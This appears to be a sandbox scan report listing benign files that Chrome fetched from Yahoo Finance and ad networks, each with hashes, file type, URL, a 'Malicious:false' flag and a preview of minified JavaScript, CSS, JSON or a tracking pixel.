                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:653708AD1BBAE1579927B6391B2A28F3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:4261E415C23DFD9D925F071737FB0D236F856F4E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:82D2DC44AAE1EDA52ABC17AFD30C6031B7175C13EE6955410164C66AE755ADFB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:4092D81BEEAADB7ECA73EE279AF0A5289CAF850253464BAA4F7695C49670C05F7E89630807A2C41D3D9CAD75D95A60719FDB1A16265537153952774F7450873C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://js-sec.indexww.com/um/ixmatch.html
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:<!doctype html><head></head><body><script>!function(t){var e={};function r(n){if(e[n])return e[n].exports;var i=e[n]={i:n,l:!1,exports:{}};return t[n].call(i.exports,i,i.exports,r),i.l=!0,i.exports}r.m=t,r.c=e,r.d=function(t,e,n){r.o(t,e)||Object.defineProperty(t,e,{enumerable:!0,get:n})},r.r=function(t){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(t,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(t,"__esModule",{value:!0})},r.t=function(t,e){if(1&e&&(t=r(t)),8&e)return t;if(4&e&&"object"==typeof t&&t&&t.__esModule)return t;var n=Object.create(null);if(r.r(n),Object.defineProperty(n,"default",{enumerable:!0,value:t}),2&e&&"string"!=typeof t)for(var i in t)r.d(n,i,function(e){return t[e]}.bind(null,i));return n},r.n=function(t){var e=t&&t.__esModule?function(){return t.default}:function(){return t};return r.d(e,"a",e),e},r.o=function(t,e){return Object.prototype.hasOwnProperty.call(t,e)},r.p="",r(r.s=0)}([function(t,e){let r=!1;const n={};let i,a,o,c;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (4112), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):4112
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.118112729463057
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:96:3hxG18jg8q1MrTq1YrAwIL6pUySq5VNTO6FtkLHeDWL:3ZumTu6AfL6v5TVoj
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:3B731541B2D25A1EDE256B475AE5E5C1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:6F8FDBD3842A3F52CEAA0EC65E71E1E703D47FC3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:2C72ED315AF753049B1BC9C5DB3BD11FAC613FC4E8F4F038DE3FEAA3C02CF3CF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:C4EC0CFDF94C8A8FC217A0EE8E5DAB2C1F85066CA2038D4F195E356E0FF253B592330C584479E87D28A0A24484F841BDCE8C14512910A18953D0A3A63AB4F768
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://s.yimg.com/aaq/wf/wf-module-2.0.0-modern.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer-module",[],t):"object"==typeof exports?exports["wafer-module"]=t():(e.wafer=e.wafer||{},e.wafer.wafers=e.wafer.wafers||{},e.wafer.wafers["wafer-module"]=t())}("undefined"!=typeof self?self:this,function(){return function(e){function t(o){if(r[o])return r[o].exports;var n=r[o]={i:o,l:!1,exports:{}};return e[o].call(n.exports,n,n.exports,t),n.l=!0,n.exports}var r={};return t.m=e,t.c=r,t.d=function(e,r,o){t.o(e,r)||Object.defineProperty(e,r,{configurable:!1,enumerable:!0,get:o})},t.n=function(e){var r=e&&e.__esModule?function(){return e.default}:function(){return e};return t.d(r,"a",r),r},t.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},t.p="https://s.yimg.com/aaq/wf/",t(t.s="./src/entry.js")}({"./src/entry.js":function(e,t,r){"use strict";function o(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}func
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Java source, ASCII text, with very long lines (7531)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):7532
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.360245185826988
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:192:PaiF7rzzTpLh7tWKhp4MWKGOocCZlY5v8wF0pNhq:PJF7PzTpLpAnMkOJCZlY5v8wFp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:441B76FCD9406E7AC5C039ACE2271A80
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:5018F6D57D1EB033D6FA77CB656903BF7145C3A9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:9EFC164DF0752A10606FD94119335CC30DFA1E15ACC6BB09E635D84EAA9FAB6C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:21FF4153CB5CD9CC0E4ABB6EE4201E93C7DDBBBAEF2D9D344DC2A7A08A4CF80D01F4AF24AC16BBE95598B2E6A1D9B5D824026B2DCE6FF493C1D7490588DDE7F6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{s as ae,p as h,b as M,w as re,i as w,j as O,l as K,k as C,x as Q,y as ce,e as oe,d as ne,q as F,H as P,z,A as _e,f as he,B as S,C as ue,c as me,u as de,g as pe,a as be,n as V}from"./scheduler.Dsuh-FKt.js";import{S as ke,i as we,g as ge,a as G,e as ye,t as J}from"./index.CvwOawEI.js";import{g as je}from"./globals.D0QH3NT1.js";import{e as U}from"./each.CI2tb2RB.js";import{g as ve}from"./spread.CgU5AtxT.js";import{g as Ne}from"./commonUtil.BWwawKjd.js";const{document:T}=je;function X(o,l,s){const t=o.slice();return t[13]=l[s],t}function Y(o,l,s){const t=o.slice();return t[16]=l[s],t}function Z(o){let l,s;return{c(){l=oe("link"),this.h()},l(t){l=ne(t,"LINK",{href:!0,rel:!0}),this.h()},h(){F(l,"href",s=typeof o[16]=="string"?o[16]:o[16].value),F(l,"rel","stylesheet")},m(t,e){C(t,l,e)},p(t,e){e&8&&s!==(s=typeof t[16]=="string"?t[16]:t[16].value)&&F(l,"href",s)},d(t){t&&w(l)}}}function A(o){let l,s=o[0].js+"",t;return{c(){l=new P(!1),t=h(),this.h()},l(e){l=z(e,!1),t=h(),this.h()},h(){l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):170
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.335916817166796
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:yionv//thPlE+tnM5OCAadCmy42/uDlhlbGlo+4/iRXTECLrlxyxtyaC/tIlsg1B:6v/lhPfZMQC19s/6TdKXTECL6yR/iVB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:E7673C60AF825466F83D46DA72CA1635
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:FC0FCBEE0835709BA2D28798A612BFD687903FB5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:F1C33E72643CE366FD578E3B5D393799E8C9EA27B180987826AF43B4FC00B65A4EAAE5E6426A23448956FEE99E3108C6A86F32FB4896C156E24AF0571A11C498
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://cm.g.doubleclick.net/pixel?google_nid=gumgum_dbm&google_hm=ZV81YTg2N2M3OC1kOTBkLTRkZjgtYjhmZi1lMDQxZDBkYzJlMjI=&gdpr=0&gdpr_consent=&google_redir=https%3A%2F%2Fusersync.gumgum.com%2Fusersync%3Fb%3Dgdv
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:.PNG........IHDR....................bKGD..............pHYs.................tIME......-Q.7n....tEXtComment.Created with The GIMP.d%n....IDAT..c.iy......+........IEND.B`..
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (10606)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):10608
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.462416140261641
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:192:oPB97G1R8idwlmT8twy8i7JlmM8twl9vMVB85i86eBEONNQVW2YvLYhxLywTLSiz:oz7G1RUm1ydmQlpGeBEOLLYDLyD0dE8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:1F28EA994BB180901B846EFC53D023A8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:BFD5A6581B5F5578EB7B0E594FED13A74F7F3E9F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:CD0CB4C9D8F0E8ACA257490C82CFA36348535602C5A58D8FDB0A23C2A6A8BD8D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:D7AD0C046BA43051F067C654BE5B55B6AF1D4562C4249CC6CEAD268BA2F3245418B4B8A8453BF4695F93900F3B795D02208CE2E80A01C7EDF021E622389A27B8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{s as De,A as Me,e as S,b as P,t as G,d as L,f as V,j as C,h as K,i as $,q as F,B as fe,L as ce,k as N,l as E,x as oe,y as ue,n as we,K as X,p as _e,m as se}from"./scheduler.Dsuh-FKt.js";import{S as ye,i as Se,c as Q,b as B,m as R,t as p,g as Y,e as q,a as I,d as U}from"./index.CvwOawEI.js";import{e as H,u as Le,o as Ve}from"./each.CI2tb2RB.js";import{g as Ne}from"./spread.CgU5AtxT.js";import{t as j,m as Pe,g as te,H as Ce,s as Oe,I as Ae}from"./commonUtil.BWwawKjd.js";import{L as x}from"./Link.vSNQugO0.js";import{L as Fe,P as Te}from"./Logo.bXT7R7fN.js";import{S as He}from"./SocialIcon.DKAjwa0M.js";import{C as Qe}from"./CDS.DMTRQPpt.js";function he(n,e,t){const o=n.slice();return o[14]=e[t],o[16]=t,o}function me(n,e,t){const o=n.slice();return o[14]=e[t],o}function ge(n,e,t){const o=n.slice();return o[14]=e[t],o}function de(n,e,t){const o=n.slice();return o[21]=e[t],o}function Be(n){let e,t;return e=new Fe({props:{width:"182",height:"25.5"}}),{c(){Q(e.$$.fragment)},l(o){B(e.$$.f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:HTML document, ASCII text, with very long lines (2498)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):6488
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.9862606059286
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:192:U3OmAEdAPZMULQ25ikN3hyTIJTs33P0HV6R4GXruWDg:uSZpLQ2wc3MmVgyAruL
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:F93A67DB949AE2C2EADB7B0CF5FF1CF2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:2FE24C96781039C92CE2B7A593CD76104A2F411D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:182864B4986EFBA29B554009E8E9DC9EE8BF292FB28CEC3FF5FDCA46ECAA44A6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:AB28D811C8BB847BA6526237163B41A1E7EDE52E87D52A5FD3246DB7723BAC873DB3B03795E43AA5D7FE40CA992EDA5BA43A0150519977FCEAA417847DD51F11
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{d as f,c as u}from"./commonUtil.BWwawKjd.js";import{l as V,f as y}from"./logUtil.CCV3qKPL.js";import{g}from"./i13nUtil.8E8_gCdn.js";function H(t){return typeof t=="string"?t:t.key}async function p(t,s){const{key:n,action:e,getComponent:a}=s;try{const[r,o]=await Promise.all([e(),typeof a=="function"?a().then(C=>C.default):Promise.resolve(void 0)]);return{key:n,action:e,getComponent:a,Component:o,error:!1,loading:!1,value:r}}catch(r){return V(t,{},{data:r,isCritical:!1,perfLabel:`loadLazy:${n}`}),{key:n,action:e,getComponent:a,error:!0,loading:!1}}}async function w(t,{action:s,getComponent:n,key:e,immediate:a=!1}){const[r,[o]]=await Promise.all([f(t),u(["lazy"],t)]),C=a||r.bot==="1"||r.mode==="failsafe",i={key:e,action:s,getComponent:n,loading:!0,error:!1};if(!C)return o.setEntry(e,i);const l=await p(t,i);return o.setEntry(e,l)}async function v(t,s){const n=H(s),[e]=await u(["lazy"],t),a=e.getEntry(n);if(!a||!a.loading)return a;const r=await p(t,a);return e.setEntry(n,r)}async fun
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (4177)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):4178
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.024668918947664
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:48:YWkMNQi+CorBrnWzEt8WL8Z+5GPGBuLGe:eMD+RrZWzEfQHF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:9DDBDF4357C3CA0519C1DF40E207E4DC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:284C011E92162035324C862C42EF2B3BB22A4984
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:291F2B69523C4ED169D1E25ADCA97D97B32BE192C52DBAAE71153831DFC9AD2C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:EA8E978C476F60A66C4A986DCC1021F8196EA06D0F29EF1565E606A608D15A97D07A9FC549B3D58D20528DFD6428C3404A8AEBE120EE2A03A72A2B74FCA9852E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/assets/SectorListings.C2wY7ASd.css
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:.tableContainer.yf-gr13h2.yf-gr13h2{width:100%;white-space:nowrap;display:none}.barContainer.yf-gr13h2.yf-gr13h2{width:100%;display:flex;justify-content:flex-end;align-items:center;gap:var(--space-2)}.barContainer.yf-gr13h2 .barBg.yf-gr13h2{position:relative;min-width:3rem;flex:1;background-color:var(--ui-gray-200);height:.75rem;display:none}.barContainer.yf-gr13h2 span.yf-gr13h2{width:3.5rem}.barContainer.yf-gr13h2 .bar.yf-gr13h2{position:absolute;top:0;left:0;height:.75rem;background-color:var(--categorical1)}.barContainer.yf-gr13h2 .bar.entireMkt.yf-gr13h2{background-color:var(--ui-gray-300)}.dropDownContainer.yf-gr13h2.yf-gr13h2{max-width:100%}.container.yf-gr13h2.yf-gr13h2{width:100%}table.yf-gr13h2.yf-gr13h2{width:100%;border-collapse:collapse}table.yf-gr13h2 .selected.yf-gr13h2{background-color:var(--table-selected)}table.yf-gr13h2 tr td.yf-gr13h2{font-weight:var(--font-normal);line-height:125%}table.yf-gr13h2 tr td.name.yf-gr13h2{font-weight:var(--font-bold)}table.yf-gr13h2 tr
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (13714), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):13714
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.23465777657958
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:384:3oEREi6qrvGmlR1IaKJoCmXK6Tb8JIFbXv00O8jp4f3tjf+88uLUH:4ER1XDlR1xVNXK6Tb8JknODjm88u4H
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:94D07DAA349C254B35FFCDA6E54CC754
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:C46D6650E0F01C7F2977182F8FE5D5A07ABA9EE5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:0291E42C6C243B4177E0331B6E3692A8E03E29A39852790CE81604A998872C68
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:8B3FEB7625D38BD50F22B838A14868D15EEBE1DFE6715A422B777A267585A1BAF9DE5982A29089C6BB7C0FC3DEAE8CE8B57F1BE851F78F1EECC9B625F08917CB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer-form",[],t):"object"==typeof exports?exports["wafer-form"]=t():(e.wafer=e.wafer||{},e.wafer.wafers=e.wafer.wafers||{},e.wafer.wafers["wafer-form"]=t())}("undefined"!=typeof self?self:this,function(){return function(e){function t(r){if(n[r])return n[r].exports;var i=n[r]={i:r,l:!1,exports:{}};return e[r].call(i.exports,i,i.exports,t),i.l=!0,i.exports}var r=window.webpackJsonpwafer_wafers_wafer_form;window.webpackJsonpwafer_wafers_wafer_form=function(t,n,o){for(var a,s,u=0,l=[];u<t.length;u++)s=t[u],i[s]&&l.push(i[s][0]),i[s]=0;for(a in n)Object.prototype.hasOwnProperty.call(n,a)&&(e[a]=n[a]);for(r&&r(t,n,o);l.length;)l.shift()()};var n={},i={1:0,2:0};return t.e=function(e){function r(){s.onerror=s.onload=null,clearTimeout(u);var t=i[e];0!==t&&(t&&t[1](new Error("Loading chunk "+e+" failed.")),i[e]=void 0)}var n=i[e];if(0===n)return new Promise(function(
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Java source, Unicode text, UTF-8 text, with very long lines (4516)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):4525
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.350142365144361
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:96:Sq9D8re18dON8daD8Slh1w3s3FIM6S1J9YLylUtyNoHK9tlBpYk8GA7foc33Dua5:z9D8re1NNlDf1z1IMV1JyumENoqpBpYJ
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:3707D6627828F078EFF604523AE380A3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:6030E5E164407942E2870F32A26F70921B79C302
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:ABD66EB5C8D38D1433AB539B8E4AE525AF017D966808B29EA749CB8215FDAFA0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:D54CA239C629A39DD725A516CB629292B85A328E280CF8818D26C23A1038C5E7104B78CB2B5F61C0A3C4C4B00467D56431A758F5186EDC13C742C40EE1DCBA58
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/chunks/ReportRating.DlNNrr8h.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{s as V,e as v,b as E,d as A,f as D,j as O,i as m,q as B,L as P,k as _,l as d,I as F,t as p,h as g,m as R,p as T,n as y}from"./scheduler.Dsuh-FKt.js";import{S as j,i as G,c as S,b as w,m as I,t as h,a as b,d as L,g as J,e as K}from"./index.CvwOawEI.js";import{f as Q,ak as C}from"./commonUtil.BWwawKjd.js";import{f as N}from"./datetimeUtils.BKCxat1F.js";import{I as U}from"./Image.CSsvaScR.js";import{I as W}from"./Icon.C8w5V9EK.js";import{S as X}from"./StatusTag.Cy1VuVbC.js";import{l as Y}from"./yf-lock.ClgspVU1.js";const k={Argus:"https://s.yimg.com/cv/apiv2/finance/subscription/ArgusLogo.png","Argus Research":"https://s.yimg.com/cv/apiv2/finance/subscription/ArgusLogo.png",Morningstar:"https://s.yimg.com/cv/apiv2/finance/subscription/MorningstarLogo.png"};function q(i){let e,t;return{c(){e=v("span"),t=p(i[0])},l(n){e=A(n,"SPAN",{});var a=D(e);t=g(a,i[0]),a.forEach(m)},m(n,a){_(n,e,a),d(e,t)},p(n,a){a&1&&R(t,n[0])},d(n){n&&m(e)}}}function z(i){let e,t,n;return{c(){e=p("."),t=v("s
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):141740
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.5766237971062065
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3072:73yzYwYujsFGxJthpY6yOlbfPSCtQT2qDYRYpjL7H:OzYwYujRxppY6yOlTP5tQBDYRYpj/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:4D64C50C27A38BEF144A440671755C8C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:BA8642465680AF07DD45D3F91EEBE3AE0F96EA04
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:CEB10E386B43670FA786795AF69D0C0D023018A4800FA72C0F7D42F3A95C82AE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:F8B3253FFA3DBAA409C16518E31C08ADD900CC7BE39F09B3766232EE57BF1C3C49E1C27FC5114EFF6A5C355BA90C2C6C99D5AE5DCA77EA4AE1D2A7994AA2300F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:"https://www.yahoo.com/caas/content/article/?uuid=8551ac12-1fc9-3d5d-ab15-8e6326882e08,7a673a73-42b0-3bbf-8576-5ad2cdb23c41,73240f47-271e-3691-bf46-85ad4f19d81c&appid=news_web&device=desktop&lang=en-US&region=US&site=fp&partner=none&bucket=900,seamless&features=enableEVPlayer,enableOverrideSpaceId,contentFeedbackEnabled,enableAdFeedbackV2,enableInArticleAd,enableOpinionLabel,enableSingleSlotting,enableVideoDocking,outStream,showCommentsIconWithDynamicCount,enableStickyAds,showCommentsIconInShareSec,enableAdSlotsNewMap,enableGAMAds,enableGAMAdsOnLoad,enableFinancePremiumTicker,enableAdLiteUpSellFeedback,enableRRAtTop,enableCommentsCountInViewCommentsCta,enableRRAdsSlots,enableRRAdsSlotsWithJAC,newsModal,enableViewCommentsCTA&rid=1pa4ckpjflnfm"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:{"items":[{"data":{"partnerData":{"adMeta":{"hashtag":"garden","isSupplySegment":"false","lang":"en-US","region":"US","rs":"lmsid:a0a6T00000R0R0tQAF;revsp:the_spruce_188;lpstaid:8551ac12-1fc9-3d5d-ab15-8e6326882e08;pt:content;pd:modal;ver:megastrm;pct:story","site_attribute":"wiki_topics=\"Getty_Images;Sense_of_smell;Dotdash_Meredith;Spray_bottle;Eucalyptus_oil\" ctopid=\"1774000;1795000\" hashtag=\"1774000;1795000\" rs=\"lmsid:a0a6T00000R0R0tQAF;revsp:the_spruce_188;lpstaid:8551ac12-1fc9-3d5d-ab15-8e6326882e08;pt:content;pd:modal;ver:megastrm;lu:0;pct:story\"","spaceid":"1197792446","site":"lifestyle","enabled":true,"pos":"","showBodyAds":false,"showPhotoAds":false},"alias":"ymedia-alias:shadow=15-smells-mice-hate-keep-110000842","canonicalSite":"lifestyle","canonicalUrl":"https://www.thespruce.com/smells-that-mice-hate-8716926","categoryLabel":"Lifestyle","commentsAllowed":true,"commentsCount":0,"contentMeta":{"adPostions":{"photos":{},"INARTICLE":3},"bodySlots":{},"cover":null,"embe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:HTML document, ASCII text, with very long lines (376)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):377
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.158638866697652
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:6:hS/ZMC1CfmlJVUhRi8f+qI83+IisOcGMlpSJA5W2ss7AqEKz2pM5N7RJvVQn8WCD:Qhz4miRNpzuIBlpygWTqX7Rj
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:6CC824CCA762B639A39A63B1298481D4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:FBB688C1D81F745E38CA77892B3CF15FF5E0399C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:9ED7745CC0431A9EC4C19D5D0DD992728CD81F792B9109455FC8982D9A4A92F7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:352DB8224B4ACC13F4FCF0EF4ACDE90A316B2396BCFD97AB1C905625CAF2F9867E7C71CB03941FE693FD0A1F736E4BE4F130A812EFDD0C32A3CD5F8885CE83C9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{F as r}from"./commonUtil.BWwawKjd.js";const a=t=>({"@context":"https://schema.org","@type":"BreadcrumbList",itemListElement:t.map((e,i)=>({"@type":"ListItem",position:i+1,name:e.title,item:e.href.startsWith("/")?new URL(e.href,r).toString():e.href}))});function o(t){return t?`<script type="application/ld+json">${JSON.stringify(t)}<\/script>`:""}export{o as c,a as g};.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Java source, ASCII text
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):165
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.80666143611544
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:JSA/FAJu6L2vWclOLNZFrZYTMQ4LNZFrSlKwM313kqugRF/FA4/FIev:vU2vWvLNZFrgMfLNZFr7wg1Ru+64Njv
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:B1FFAED8B9668B395F784DD975A882AF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:85F4BA4EB4ED11CC6BE25F67175519E9D2B8DA3E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:BF3179BEB53AAF37783F1D610493AFDC2285B0E159F25477E9C0A78B38FE9364
